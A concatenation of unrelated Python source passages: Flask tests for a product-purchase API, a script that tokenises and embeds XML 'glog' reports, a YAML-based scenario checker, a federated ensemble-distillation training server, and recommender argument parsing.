post_shopcartitem_mock: post_shopcartitem_mock.return_value.status_code=201 json = {"user_id": user_id, "amount": 4} product = self._create_products(1) resp = self.app.post("/api/products/{}/purchase".format(product[0].id), json=json, content_type="application/json") self.assertEqual(resp.status_code, status.HTTP_200_OK) self.assertEqual(resp.data, b'{"message":"Product successfully added into the shopping cart"}\n') def test_purchase_product_not_found(self): '''Purchase a Product That's Not Found''' user_id = 101 with patch('requests.get') as get_shopcart_by_userid_mock: get_shopcart_by_userid_mock.return_value.status_code = 200 get_shopcart_by_userid_mock.return_value.json.return_value = [{"create_time": "2020-11-15T19:36:28.302839","id": 6,"update_time": "2020-11-15T19:36:28.302839","user_id": 101}] with patch('service.service.add_item_to_shopcart') as post_shopcart_item_mock: post_shopcart_item_mock.return_value.status_code=201 json = {"user_id": user_id, "amount": 4} resp = self.app.post("/api/products/1/purchase", json=json, content_type="application/json") self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND) def test_purchase_product_cannot_add_shopcart(self): '''Purchase a Product Not Added Into Shopcart (Shopcart Exists) ''' user_id = 101 with patch('requests.get') as get_shopcart_by_userid_mock: get_shopcart_by_userid_mock.return_value.status_code = 200 get_shopcart_by_userid_mock.return_value.json.return_value = [{"create_time": "2020-11-15T19:36:28.302839","id": 6,"update_time": "2020-11-15T19:36:28.302839","user_id": 101}] with patch('service.service.add_item_to_shopcart') as post_shopcart_item_mock: post_shopcart_item_mock.return_value.status_code=400 json = {"user_id": user_id, "amount": 4} product = self._create_products(1) resp = self.app.post("/api/products/{}/purchase".format(product[0].id), json=json, content_type="application/json") self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND) self.assertEqual(resp.data, b'{"message": "Product was not added in the shopping cart because of an error"}\n') def test_purchase_product_empty_user_id(self): '''Purchase a Product Empty User ID''' user_id = "" with patch('requests.get') as get_shopcart_by_userid_mock: get_shopcart_by_userid_mock.return_value.status_code = 200 get_shopcart_by_userid_mock.return_value.json.return_value = [{"create_time": "2020-11-15T19:36:28.302839","id": 6,"update_time": "2020-11-15T19:36:28.302839","user_id": 101}] with patch('service.service.add_item_to_shopcart') as post_shopcart_item_mock: post_shopcart_item_mock.return_value.status_code=201 json = {"user_id": user_id, "amount": 4} product = self._create_products(1) resp = self.app.post("/api/products/{}/purchase".format(product[0].id), json=json, content_type="application/json") self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST) self.assertEqual(resp.data, b'{"message": "Fields cannot be empty"}\n') def test_purchase_product_empty_amount(self): '''Purchase a Product Empty Amount ''' user_id = 101 with patch('requests.get') as get_shopcart_by_userid_mock: get_shopcart_by_userid_mock.return_value.status_code = 200 get_shopcart_by_userid_mock.return_value.json.return_value = [{"create_time": "2020-11-15T19:36:28.302839","id": 6,"update_time": "2020-11-15T19:36:28.302839","user_id": 101}] with patch('service.service.add_item_to_shopcart') as post_shopcart_item_mock: post_shopcart_item_mock.return_value.status_code=201 json = {"user_id": user_id, "amount": ""} product = self._create_products(1) resp = self.app.post("/api/products/{}/purchase".format(product[0].id), json=json, content_type="application/json") self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST) self.assertEqual(resp.data, b'{"message": "Fields cannot be empty"}\n') def test_purchase_product_id_not_int(self): '''Purchase a Product ID not Int ''' user_id = 101 with patch('requests.get') as get_shopcart_by_userid_mock: get_shopcart_by_userid_mock.return_value.status_code = 200 get_shopcart_by_userid_mock.return_value.json.return_value = [{"create_time": "2020-11-15T19:36:28.302839","id": 6,"update_time": "2020-11-15T19:36:28.302839","user_id": 101}] with patch('service.service.add_item_to_shopcart') as post_shopcart_item_mock: post_shopcart_item_mock.return_value.status_code=201 json = {"user_id": user_id, "amount": 4} resp = self.app.post("/api/products/{}/purchase".format("test"), json=json, content_type="application/json") self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST) self.assertEqual(resp.data, b'{"message": "Invalid Product ID. Must be Integer"}\n') def test_purchase_amount_not_int(self): '''Purchase a Product Amount not Int ''' user_id = 101 with patch('requests.get') as get_shopcart_by_userid_mock: get_shopcart_by_userid_mock.return_value.status_code = 200 get_shopcart_by_userid_mock.return_value.json.return_value = [{"create_time": "2020-11-15T19:36:28.302839","id": 6,"update_time": "2020-11-15T19:36:28.302839","user_id": 101}] with patch('service.service.add_item_to_shopcart') as post_shopcart_item_mock: post_shopcart_item_mock.return_value.status_code=201 json = {"user_id": user_id, "amount": "hello"} product = self._create_products(1) resp = self.app.post("/api/products/{}/purchase".format(product[0].id), json=json, content_type="application/json") self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST) self.assertEqual(resp.data, b'{"message": "Invalid Amount. Must be Integer"}\n') def test_purchase_user_id_not_int(self): '''Purchase a Product User ID not Int ''' user_id = "testing" with patch('requests.get') as get_shopcart_by_userid_mock: get_shopcart_by_userid_mock.return_value.status_code = 200 get_shopcart_by_userid_mock.return_value.json.return_value = [{"create_time": "2020-11-15T19:36:28.302839","id": 6,"update_time": "2020-11-15T19:36:28.302839","user_id": 101}] with patch('service.service.add_item_to_shopcart') as post_shopcart_item_mock: post_shopcart_item_mock.return_value.status_code=201 json = {"user_id": user_id, "amount": 4} product = self._create_products(1) resp = self.app.post("/api/products/{}/purchase".format(product[0].id), json=json, content_type="application/json") self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST) self.assertEqual(resp.data, b'{"message": "Invalid User ID. Must be Integer"}\n') def test_purchase_unsuccessful_product_shopcart_error(self): '''Purchase a Product Shopcart Doesn't Exist (ShopCart Creation Error)''' user_id = 101 with patch('requests.get') as get_shopcart_by_userid_mock: get_shopcart_by_userid_mock.return_value.status_code = 200 get_shopcart_by_userid_mock.return_value.json.return_value = [] with patch('service.service.create_shopcart') as create_shopcart_mock: create_shopcart_mock.return_value.status_code=400 json = {"user_id": user_id, "amount": 4} product = self._create_products(1) resp = self.app.post("/api/products/{}/purchase".format(product[0].id), json=json, content_type="application/json") self.assertEqual(resp.status_code,status.HTTP_400_BAD_REQUEST) self.assertEqual(resp.data,b'{"message": "Cannot create shopcart so cannot add product into shopping cart"}\n' ) def test_purchase_product_shopcart_unsuccessful_product(self): '''Purchase a Product (Product Adding Error) ''' user_id = 101 with patch('requests.get') as get_shopcart_by_userid_mock: get_shopcart_by_userid_mock.return_value.status_code = 200 get_shopcart_by_userid_mock.return_value.json.return_value = [] with patch('service.service.create_shopcart') as create_shopcart_mock: create_shopcart_mock.return_value.status_code=201 with patch('service.service.add_item_to_shopcart') as post_shopcartitem_mock: post_shopcartitem_mock.return_value.status_code=400 json = {"user_id": user_id, "amount": 4} product = self._create_products(1) resp = self.app.post("/api/products/{}/purchase".format(product[0].id), json=json, content_type="application/json") self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST) self.assertEqual(resp.data, b'{"message": "Product not successfully added into the shopping cart"}\n') def test_data_validation_error(self): '''Data Validation Error ''' test_product = ProductFactory() data = test_product.serialize() data.pop('name', None) resp = self.app.post( "/api/products", json=data, content_type="application/json" ) self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST) self.assertIn(b'Bad Request', resp.data) def test_404_not_found_error(self): '''Resources Not Found Error ''' resp = self.app.get("/products/{}") self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND) self.assertIn(b'Not Found', resp.data) def test_method_not_allowed_error(self): '''Test Method Not Allowed Error ''' resp = self.app.post("/") self.assertEqual(resp.status_code, status.HTTP_405_METHOD_NOT_ALLOWED) self.assertIn(b'Method not Allowed', resp.data) def test_unsupported_media_type_error(self): '''Unsupported Media Requests ''' test_product = ProductFactory() resp = self.app.post( "/api/products", json=test_product.serialize(), content_type="text/javascript" ) self.assertEqual(resp.status_code, status.HTTP_415_UNSUPPORTED_MEDIA_TYPE) self.assertIn(b'{"message": "Content-Type must be application/json"}\n', resp.data) def test_internal_server_error(self): '''Internal Server Error ''' resp = internal_server_error("internal serval error") self.assertEqual(resp[1], status.HTTP_500_INTERNAL_SERVER_ERROR)
<reponame>LPirch/tagvet import re import argparse import pickle import xml.etree.ElementTree as ET from collections import Counter from tqdm import tqdm import joblib from features import get_ref_hashes, _filter_xml_iter, get_tokens from build_vocab import load_yaml RE_DELIM = re.compile(r'(\W+)') PAD_DIM = 1 PLACEHOLDER_DIM = 2 def parse_args(): parser = argparse.ArgumentParser() parser.add_argument('data_zip', help='zip file with glog data') parser.add_argument('label_file', help='label file (csv)') parser.add_argument('vocab_file', help='token vocab (pickle)') parser.add_argument('feat_file', help='raw feature file (pickle)') parser.add_argument('vocab_out', help='output (word-level) vocab (pkl)') parser.add_argument('--config_file', default='extraction_conf.yml', help='name of the config file') parser.add_argument('--jobs', type=int, default=1, help='number of parallel processes') parser.add_argument('--min_df', type=int, default=1, help='minimum absolute document frequency') args = parser.parse_args() return vars(args) def extract_features(zip_name, ref_hashes, vocab, feat_file, vocab_out, jobs, min_df, **extraction_kwargs): """ Extract features from zipped glogs, construct vocabulary, embed features and save the feature matrix and vocabulary. NOTE: This uses a second vocabulary on the word level (combined tokens with delimiters like paths etc.) as opposed to the provided vocabulary on token level! @param zip_name: zip file with glog reports @param ref_hashes: reference list of hashes (for ordering) @param vocab: vocabulary dict @param feat_file: output file for feature matrix @param vocab_out: output file for new (filtered) vocab @param jobs: number of parallel processes @param min_df: minimum document frequency @param extraction_kwargs: additional extraction keyword/value arguments """ print('[-] extract filtered raw data') with joblib.parallel_backend('loky'): X_raw = joblib.Parallel(n_jobs=jobs)(joblib.delayed( get_tokens)(zip_name, [ref_h], get_filtered, verbose=False, vocab=vocab, **extraction_kwargs) for ref_h in tqdm(ref_hashes)) # analyze df print('[-] analyzing glogs') with joblib.parallel_backend('loky'): doc_freqs = joblib.Parallel(n_jobs=jobs)(joblib.delayed( count_df)(glog,) for glog in tqdm(X_raw)) df = sum(doc_freqs, Counter()) # build new vocab vocab = {'PAD': PAD_DIM, '*': PLACEHOLDER_DIM} max_row_len = 0 print('[-] build new vocab') for glog in tqdm(X_raw): glog_tokens = set() for row in glog: glog_tokens |= set(row) max_row_len = max(len(row), max_row_len) for token in glog_tokens: if token not in vocab and df[token] >= min_df: vocab[token] = len(vocab) + 1 print("[-] finished. vocab size: ", len(vocab)) # embed print('[-] embedding dataset') with joblib.parallel_backend('loky'): X_emb = joblib.Parallel(n_jobs=jobs)(joblib.delayed( embed_single)(glog, vocab, max_row_len) for glog in tqdm(X_raw)) # save with open(feat_file, 'wb') as pkl: pickle.dump(X_emb, pkl) with open(vocab_out, 'wb') as pkl: pickle.dump(vocab, pkl) def get_filtered(glog, vocab=None, ignored_nodes=None, ignored_attribs=None): """ Retrieve filtered tokens from glog contents (as string) """ xml = ET.fromstring(glog) for node in _filter_xml_iter(xml, ignored_nodes, ignored_attribs): yield _serialize_vocab(node, vocab) def _serialize_vocab(node, vocab): """ Replace rare substrings by '*' and merge them again using the original delimiter. @param node: xml node (glog function call) @param vocab: dictionary mapping tokens to dimensions """ tokens = [] tag = node.tag if node.tag not in vocab: tag = '*' tokens.append(tag) for k, v in node.attrib.items(): v = v.lower() if k not in vocab: k = '*' tokens.append(k) split_v = RE_DELIM.split(v) delims = [] vals = [] for sp_val in split_v: if RE_DELIM.match(sp_val): delims.append(sp_val) else: vals.append(sp_val) # add one delim at the end for equally-sized lists delims.append('') vals = [v if v in vocab else '*' for v in vals] # merge with delimiters merged_vals = [] for val, delim in zip(vals, delims): merged_vals.append(val) merged_vals.append(delim) tokens.append(''.join(merged_vals)) return tokens def count_df(glog): """ Count document frequencies. @param glog: xml root of glog.xml """ df = Counter() glog_tokens = set() for tokens in glog: glog_tokens |= set(tokens) for token in glog_tokens: if token not in df: df[token] = 1 return df def embed_single(glog, vocab, max_row_len): """ Embed glog tokens according to a vocabulary, clipping at max_row_len. @param glog: list of extracted tokens (after _serialize_vocab) @param vocab: dictionary mapping each token to a dimension @param max_row_len: maximum number of function call arguments (determined by analyzing the dataset and used to pad all rows to the same length) """ glog_rows = [] for row in glog: emb_row = [vocab.get(token, PLACEHOLDER_DIM) for token in row] emb_row += [PAD_DIM]*(max_row_len - len(emb_row)) glog_rows.append(emb_row) return glog_rows def main(data_zip, label_file, vocab_file, feat_file, vocab_out, jobs, config_file, min_df): """ Embed features according to a given vocabulary and save them in a pickle file. @param data_zip: zip file with glog data @param label_file: label file (csv) @param vocab_file: token vocab (pickle) @param feat_file: raw feature file (pickle) @param vocab_out: output (word-level) vocab (pkl) @param config_file: name of the config file @param jobs: number of parallel processes @param min_df: minimum absolute document frequency """ cnf = load_yaml(config_file) ref_hashes = get_ref_hashes(label_file) vocab = pickle.load(open(vocab_file, 'rb')) extract_features(data_zip, ref_hashes, vocab, feat_file, vocab_out, jobs, min_df, **cnf) if __name__ == '__main__': args = parse_args() main(**args)
from datetime import ( datetime, timedelta, ) from core import constants from core.issues import issue_utils from core.searchtools import ( FileSearcher, SearchDef, ) from core.log import log from core.ycheck import ( YDefsLoader, YDefsSection, AutoChecksBase, YAMLDefInput, YAMLDefExpr, YAMLDefRequires, ) class YAMLDefScenarioCheck(YAMLDefExpr, YAMLDefRequires, YAMLDefInput): """ Override grouping used by scenario checks. Adds an additional 'meta' override that can be used to provide metadata to the check implementation. """ KEYS = [] + YAMLDefExpr.KEYS + YAMLDefRequires.KEYS + YAMLDefInput.KEYS KEYS.append('meta') def __getattr__(self, name): if self._override_name == 'meta': return self.content.get(name) else: return super().__getattr__(name) class ScenarioCheckMeta(object): def __init__(self, meta): self._meta = meta or {} @property def period(self): """ If min is provided this is used to determine the period within which min applies. If period is unset, the period is infinite i.e. across all available data. Supported values: <int> hours """ return self._meta.period @property def min(self): """ Minimum search matches required for result to be True (default is 1) """ return int(self._meta.min or 1) class ScenarioCheck(object): """ See YAMLDefScenarioCheck for overrides used with this class. A scenario is defined as requiring one (and only one) of the following: * a search expression to match against an input (file or command). * a property to match a given value See ScenarioCheckMeta for optional metadata. """ def __init__(self, name, input=None, expr=None, meta=None, requires=None): self.name = name self.input = input self.expr = expr self.meta = ScenarioCheckMeta(meta) self.requires = requires @classmethod def get_datetime_from_result(cls, result): ts = "{} {}".format(result.get(1), result.get(2)) return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S.%f") @classmethod def filter_by_period(cls, results, period, min_results): _results = [] for r in results: ts = cls.get_datetime_from_result(r) _results.append((ts, r)) results = [] last = None prev = None count = 0 for r in sorted(_results, key=lambda i: i[0], reverse=True): if last is None: last = r[0] elif r[0] < last - timedelta(hours=period): last = prev prev = None # pop first element since it is now invalidated count -= 1 results = results[1:] elif prev is None: prev = r[0] results.append(r) count += 1 if count >= min_results: # we already have enough results so return break if len(results) < min_results: return [] return [r[1] for r in results] @property def result(self): if self.expr: s = FileSearcher() s.add_search_term(SearchDef(self.expr.value, tag='all'), self.input.path) results = s.search() if not results: log.debug("scenario check %s: False", self.name) return False results = results.find_by_tag('all') if self.meta.min: if self.meta.period: count = len(self.filter_by_period(results, self.meta.period, self.meta.min)) else: count = len(results) if count >= self.meta.min: return True else: log.debug("scenario check %s: not enough matches (%s) to " "satisfy min of %s", self.name, count, self.meta.min) return False else: return len(results) > 0 elif self.requires: return self.requires.passes else: raise Exception("unknown scenario check type") class ScenarioConclusions(object): def __init__(self, priority, decision=None, raises=None, checks=None): self.priority = priority self.decision = decision self.raises = raises self.checks = checks self.issue_message = None self.issue_type = None def get_check_result(self, name): result = None if name in self.checks: result = self.checks[name].result return result def _run_conclusion(self): if self.decision.is_singleton: return self.get_check_result(self.decision.content) else: for _bool, checks in self.decision: results = [self.get_check_result(c) for c in checks] if _bool == 'and': return all(results) elif _bool == 'or': return any(results) else: log.debug("unsupported boolean decsion '%s'", _bool) return False @property def reached(self): """ Return true if a conclusion has been reached. """ result = self._run_conclusion() fdict = self.raises.format_dict or {} self.issue_message = str(self.raises.message).format(**fdict) self.issue_type = self.raises.type return result class Scenario(object): def __init__(self, name, checks, conclusions): self.name = name self._checks = checks self._conclusions = conclusions @property def checks(self): section = YDefsSection('checks', self._checks.content, checks_handler=self) _checks = {} for c in section.leaf_sections: _checks[c.name] = ScenarioCheck(c.name, c.input, c.expr, c.meta, c.requires) return _checks @property def conclusions(self): section = YDefsSection('conclusions', self._conclusions.content, checks_handler=self) _conclusions = {} for r in section.leaf_sections: priority = r.priority or 1 _conclusions[r.name] = ScenarioConclusions(int(priority), r.decision, r.raises, self.checks) return _conclusions class YScenarioChecker(AutoChecksBase): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self._scenarios = [] def load(self): plugin_content = YDefsLoader('scenarios').load_plugin_defs() if not plugin_content: return yscenarios = YDefsSection(constants.PLUGIN_NAME, plugin_content, extra_overrides=[YAMLDefScenarioCheck], checks_handler=self) log.debug("sections=%s, scenarios=%s", len(yscenarios.branch_sections), len(yscenarios.leaf_sections)) if yscenarios.requires and not yscenarios.requires.passes: log.debug("plugin not runnable - skipping scenario checks") return for scenario in yscenarios.leaf_sections: if scenario.requires: requires_passes = scenario.requires.passes else: requires_passes = True if requires_passes: self._scenarios.append(Scenario(scenario.name, scenario.checks, scenario.conclusions)) @property def scenarios(self): return self._scenarios def run(self): for scenario in self.scenarios: result = None log.debug("running scenario: %s", scenario.name) # run all conclusions and use highest priority result for name, conc in scenario.conclusions.items(): if conc.reached: if not result: result = conc elif conc.priority > result.priority: result = conc log.debug("conclusion is: %s (priority=%s)", name, result.priority) if result: issue_utils.add_issue(result.issue_type(result.issue_message)) else: log.debug("no conlusion reached")
from .server_base import ServerBase import copy import torch.optim as optim import torch.nn.functional as F import torch import torch.nn as nn from torch.utils.data import DataLoader from ..models.models import create_model from ..datasets.dataset_student import StudentData import numpy as np import sys class FedEdServer(ServerBase): """ Class defining server for federated ensemble distillation. """ def __init__(self, args, model, run_folder, train_loaders, test_loader, public_loader) -> None: super().__init__(args, model, run_folder, train_loaders, test_loader, public_loader) self.student_models = [student for student in args.student_models.split(' ')] self.logits_local = None self.local_epochs_ensemble = args.local_epochs_ensemble self.student_batch_size = args.student_batch_size self.public_batch_size = args.public_batch_size self.student_epochs = args.student_epochs self.student_epochs_w2 = args.student_epochs_w2 self.public_data_sizes = [int(x) for x in args.public_data_sizes.split(' ')] self.weight_schemes_list = [int(x) for x in args.weight_schemes.split(' ')] self.weight_scheme = self.weight_schemes_list[0] self.client_sample_fraction = args.client_sample_fraction self.ae_public_weights = [] self.ae_test_weights = [] self.autoencoder_epochs = args.autoencoder_epochs self.student_lr = args.student_lr self.student_lr_w2 = args.student_lr_w2 self.student_loss = args.student_loss def run(self): """ Execute federated training and distillation. Parameters: round_nr (int): Current round number. """ ensemble_public_logits, ensemble_test_logits = [], [] local_accs, local_losses = [], [] for j in range(self.n_clients): print("-- Training client nr {} --".format(j+1)) accs, losses = self._local_training(j) local_accs.extend([accs]) local_losses.extend([losses]) self._save_results(local_accs, "client_accuracy") self._save_results(local_losses, "client_loss") local_public_logits, local_test_logits = self._get_local_logits() if 2 in self.weight_schemes_list: public_weights, test_weights = self._get_autoencoder_weights(client_nr=j) self.ae_public_weights.append(public_weights) self.ae_test_weights.append(test_weights) ensemble_public_logits.append(local_public_logits) ensemble_test_logits.append(local_test_logits) for scheme in self.weight_schemes_list: self.weight_scheme = scheme ensemble_test_acc = self._ensemble_accuracy(ensemble_test_logits) print("Ensemble-w{} test accuracy: {:.0f}%".format(scheme, ensemble_test_acc)) self._save_results([ensemble_test_acc], f"w{scheme}_ensemble_test_acc") print("") losses = ["ce"] for scheme in self.weight_schemes_list: self.weight_scheme = scheme if scheme == 2: #losses.append("ce") self.student_epochs = self.student_epochs_w2 self.student_lr = self.student_lr_w2 for loss in losses: self.student_loss = loss for student_model in self.student_models: print(f"|| Training student model: {student_model}. Weight scheme: {scheme}. Loss: {loss} ||") for public_size in self.public_data_sizes: print(f"Public dataset size: {public_size}") student_loader, public_train_loader, public_val_loader = self._get_student_data_loaders(public_size, ensemble_public_logits) train_accs, train_losses, val_accs, val_losses = self._train_student(student_model, ensemble_public_logits, student_loader, public_train_loader, public_val_loader, public_size) test_acc, test_loss = self.evaluate(self.global_model, self.test_loader) self._save_results([train_accs, train_losses, val_accs, val_losses], f"w{scheme}_student_{student_model}_{loss}_train_results_{public_size}") self._save_results([test_acc, test_loss], f"w{scheme}_student_{student_model}_{loss}_test_results_{public_size}") print('\nStudent Model Test: Avg. loss: {:.4f}, Accuracy: {:.0f}%\n'.format( test_loss, test_acc)) def _local_training(self, client_nr): """ Complete local training at client. Parameters: client_nr (int): ID for the client to do local training at. """ self.local_model = copy.deepcopy(self.global_model).to(self.device) self.local_model.train() optimizer = optim.SGD(self.local_model.parameters(), lr=self.lr_rate, momentum=self.momentum) train_accs, train_losses = [], [] for i in range(self.local_epochs_ensemble): for x, y in self.train_loaders[client_nr]: x, y = x.to(self.device), y.to(self.device) optimizer.zero_grad() output = self.local_model(x) error = self.loss_function(output, y) error.backward() optimizer.step() train_acc, train_loss = self.evaluate(self.local_model, self.train_loaders[client_nr]) train_accs.append(train_acc) train_losses.append(train_loss) print("Epoch {}/{} Train accuracy: {:.0f}% Train loss: {:.4f}".format( i+1, self.local_epochs_ensemble, train_acc, train_loss), end="\r", flush=True) print("Training completed") print("Train accuracy: {:.0f}% Train loss: {:.4f}\n".format(train_acc, train_loss), flush=True) return train_accs, train_losses def _train_student(self, student_model, ensemble_logits, student_loader, public_train_loader, public_val_loader, public_size): model = create_model(student_model).to(self.device) loss_function = nn.MSELoss() if self.student_loss == "mse" else nn.CrossEntropyLoss() optimizer = optim.Adam(model.parameters(), lr=self.student_lr) train_accs, train_losses, val_accs, val_losses = [], [], [], [] for epoch in range(self.student_epochs): model.train() for x, idx in student_loader: x = x.to(self.device) idx = idx.to(self.device) active_clients = np.random.choice(np.arange(self.n_clients), int(self.client_sample_fraction * self.n_clients), replace=False) merged_logits = torch.zeros(self.student_batch_size, self.n_classes, device=self.device) for c in active_clients: if len(idx) != self.student_batch_size: selected_logits = torch.zeros(self.student_batch_size, self.n_classes, device=self.device) selected_logits[:len(idx), self.n_classes-1] = ensemble_logits[c][idx] else: selected_logits = ensemble_logits[c][idx] merged_logits += selected_logits * self._ensemble_weight(client_nr=c, active_clients=active_clients, sample_indices=idx) if self.student_loss == "ce": _, merged_logits = torch.max(merged_logits, 1) elif self.weight_scheme == 2: merged_logits = (merged_logits.T / torch.sum(merged_logits, 1)).T optimizer.zero_grad() output = model(x) loss = loss_function(output, merged_logits) loss.backward() optimizer.step() train_acc, train_loss = self.evaluate(model, public_train_loader) val_acc, val_loss = self.evaluate(model, public_val_loader) train_accs.append(train_acc) train_losses.append(train_loss) val_accs.append(val_acc) val_losses.append(val_loss) print("Epoch {}/{} Train accuracy: {:.0f}% Train loss: {:.4f} Val accuracy: {:.0f}% Val loss: {:.4f}".format( epoch+1, self.student_epochs, train_acc, train_loss, val_acc, val_loss), end="\r", flush=True) self.global_model = model return train_accs, train_losses, val_accs, val_losses def _get_autoencoder_weights(self, client_nr): """ """ autoencoder = create_model(self.dataset_name + "_autoencoder").to(self.device) optimizer = torch.optim.Adam(autoencoder.parameters(), lr=0.001, weight_decay=1e-05) loss_fn = nn.MSELoss() print("Training autoencoder") for epoch in range(self.autoencoder_epochs): autoencoder.train() train_loss = [] for img_batch, _ in self.train_loaders[client_nr]: img_batch = img_batch.to(self.device) output = autoencoder(img_batch) loss = loss_fn(output, img_batch) optimizer.zero_grad() loss.backward() optimizer.step() train_loss.append(loss.detach().cpu().numpy()) train_loss = np.mean(train_loss) print('Epoch {}/{} \t train loss {}'.format(epoch + 1, self.autoencoder_epochs, train_loss), end="\r") print("\n\n") autoencoder.eval() public_samples_loss = [] with torch.no_grad(): for img_batch, _ in self.public_loader: img_batch = img_batch.to(self.device) output = autoencoder(img_batch) sample_loss = [] for j in range(len(img_batch)): sample_loss.append(torch.mean((output[j]-img_batch[j])*(output[j]-img_batch[j]))) public_samples_loss.extend(sample_loss) test_samples_loss = [] with torch.no_grad(): for img_batch, _ in self.test_loader: img_batch = img_batch.to(self.device) output = autoencoder(img_batch) sample_loss = [] for j in range(len(img_batch)): sample_loss.append(torch.mean((output[j]-img_batch[j])*(output[j]-img_batch[j]))) test_samples_loss.extend(sample_loss) ae_public_weights = torch.tensor([1/sample_loss**6 for sample_loss in public_samples_loss], device=self.device) ae_test_weights = torch.tensor([1/sample_loss**6 for sample_loss in test_samples_loss], device=self.device) return ae_public_weights, ae_test_weights def _get_student_data_loaders(self, data_size, ensemble_logits): """ """ merged_logits = torch.zeros(ensemble_logits[0].shape, device=self.device) for c in range(self.n_clients): merged_logits += ensemble_logits[c] * self._ensemble_weight(client_nr=c, active_clients=np.arange(self.n_clients)) _, targets = torch.max(merged_logits, 1) train_size = int(0.8 * data_size) train_indices, val_indices = np.arange(train_size), np.arange(train_size, data_size) public_train_data = copy.deepcopy(self.public_loader.dataset) public_train_data.dataset.targets = targets.to('cpu') public_val_data = copy.deepcopy(public_train_data) public_train_data.indices, public_val_data.indices = train_indices, val_indices student_data = copy.deepcopy(self.public_loader.dataset) student_data.indices = train_indices public_train_loader = DataLoader(public_train_data, batch_size=self.public_batch_size, num_workers=self.num_workers) public_val_loader = DataLoader(public_val_data, batch_size=self.public_batch_size, num_workers=self.num_workers) student_loader = DataLoader(StudentData(student_data), self.student_batch_size, shuffle=True, num_workers=self.num_workers) return student_loader, public_train_loader, public_val_loader def _ensemble_weight(self, client_nr, active_clients, sample_indices=None, test=False): """ Weight client contributions. Parameters: client_nr (int): ID for client. """ if self.weight_scheme == 0: return self.n_samples_client[client_nr] / sum([self.n_samples_client[c] for c in active_clients]) elif self.weight_scheme == 1: return torch.true_divide(self.label_count_matrix[client_nr], torch.sum(self.label_count_matrix[active_clients], axis=0)+0.001) elif self.weight_scheme == 2: weights = self.ae_test_weights if test else self.ae_public_weights if sample_indices is None: return weights[client_nr][:, None] else: return weights[client_nr][sample_indices, None] else: print("Chosen weight scheme is not implemented.") sys.exit(0) def _get_local_logits(self): """ """ self.local_model.eval() public_logits = None with torch.no_grad(): for x, _ in self.public_loader: x = x.to(self.device) if public_logits is None: public_logits = F.softmax(self.local_model(x), dim=1) else: public_logits = torch.cat((public_logits, F.softmax(self.local_model(x), dim=1))) test_logits = None with torch.no_grad(): for x, _ in self.test_loader: x = x.to(self.device) if test_logits is None: test_logits = F.softmax(self.local_model(x), dim=1) else: test_logits = torch.cat((test_logits, F.softmax(self.local_model(x), dim=1))) return public_logits.to(self.device), test_logits.to(self.device) def _get_student_targets(self, ensemble_output, public_size): """ """ #_, ensemble_output = torch.max(ensemble_output, 1) targets = torch.zeros(ensemble_output.shape) for i in range(public_size): idx_public = self.public_loader.dataset.indices[i] targets[idx_public] = ensemble_output[i] return targets def _ensemble_accuracy(self, ensemble_logits): merged_logits = torch.zeros(ensemble_logits[0].shape, device=self.device) for c in range(self.n_clients): merged_logits += ensemble_logits[c] * self._ensemble_weight(client_nr=c, active_clients=np.arange(self.n_clients), test=True) #targets = self.public_loader.dataset.dataset.targets[self.public_loader.dataset.indices].to(self.device) targets = self.test_loader.dataset.targets.to(self.device) _, preds = torch.max(merged_logits, 1) correct = (preds == targets).sum().item() return 100. * correct / len(self.test_loader.dataset)
import argparse def parse_args(): parser = argparse.ArgumentParser(description='test recommender') # common settings # python main.py --algo_name mf --dataset ml-100k --epochs 10 --gce parser.add_argument('--seed', type=int, default=1234, help='tuning epochs') parser.add_argument('--printall', action="store_true", default=False, help='activate saving all training results in csv') parser.add_argument('--tune_epochs', type=int, default=100, help='tuning epochs') parser.add_argument('--remove_top_users', type=int, default=0, help='% of top users to remove') parser.add_argument('--remove_on', type=str, default='item', help='apply remove top_users on item/user') parser.add_argument('--gcetype', type=str, default='gce', help='choose in [gce, gat, sgc, sage, cluster]') parser.add_argument("--logs", action="store_false", default=True, help="Enables logs") parser.add_argument("--rankall", action="store_true", default=False, help="Enables rank between all items") parser.add_argument("--statistics", action="store_true", default=False, help="Enables statistics dataset") parser.add_argument("--context_as_userfeat", action="store_true", default=False, help="Enables using context as user multihot features") parser.add_argument("--save_initial_weights", action="store_true", default=False, help="Enables saving epoch 0 weights.") parser.add_argument("--load_init_weights", action="store_true", default=False, help="Enables loading init weights") parser.add_argument("--not_early_stopping", action="store_true", default=False, help="Enables not doing early stopping") parser.add_argument("--logsname", default="", help="Enables logs") parser.add_argument('--reindex', action='store_false', default=True, help='activate if do not want to reindex items') parser.add_argument('--uii', action='store_true', default=False, help='activate if you want to add context with same embebddings') parser.add_argument('--random_context', action='store_true', default=False, help='activate if you want to do experiment with random last clicked item as context') parser.add_argument('--neg_sampling_each_epoch', action='store_true', default=False, help='activate if we want to perform neg_sampling in each epoch') parser.add_argument('--context', action='store_false', default=True, help='activate if do not want to add context') parser.add_argument('--context_type', type=str, default='cost', help='type context frappe') parser.add_argument('--gce', action='store_true', default=False, help='activate to use GCE layer instead of current embbedding layer') parser.add_argument('--side_information', action='store_true', default=False, help='activate to use side_information features') parser.add_argument('--actors', action='store_true', default=False, help='activate to use ACTORS appended to side_information features') # parser.add_argument('--reg2', # action='store_true', # default=False, # help='activate to use regularizations') parser.add_argument('--cut_down_data', action='store_true', default=False, help='activate to use half interactions per user --> reduce dataset size') parser.add_argument('--mf', action='store_true', default=False, help='activate to use MF in NFM ') parser.add_argument('--mh', type=int, default=1, help='HOPS TO ENABLE -- MULTI HOP FUNCTION') parser.add_argument('--problem_type', type=str, default='pair', help='pair-wise or point-wise') parser.add_argument('--algo_name', type=str, default='fm', help='algorithm to choose') parser.add_argument('--dataset', type=str, default='ml-100k', help='select dataset') parser.add_argument('--prepro', type=str, default='origin', help='dataset preprocess op.: origin/Ncore/filter') parser.add_argument('--topk', type=int, default=21, help='top number of recommend list') parser.add_argument('--test_method', type=str, default='tloo', help='method for split test,options: 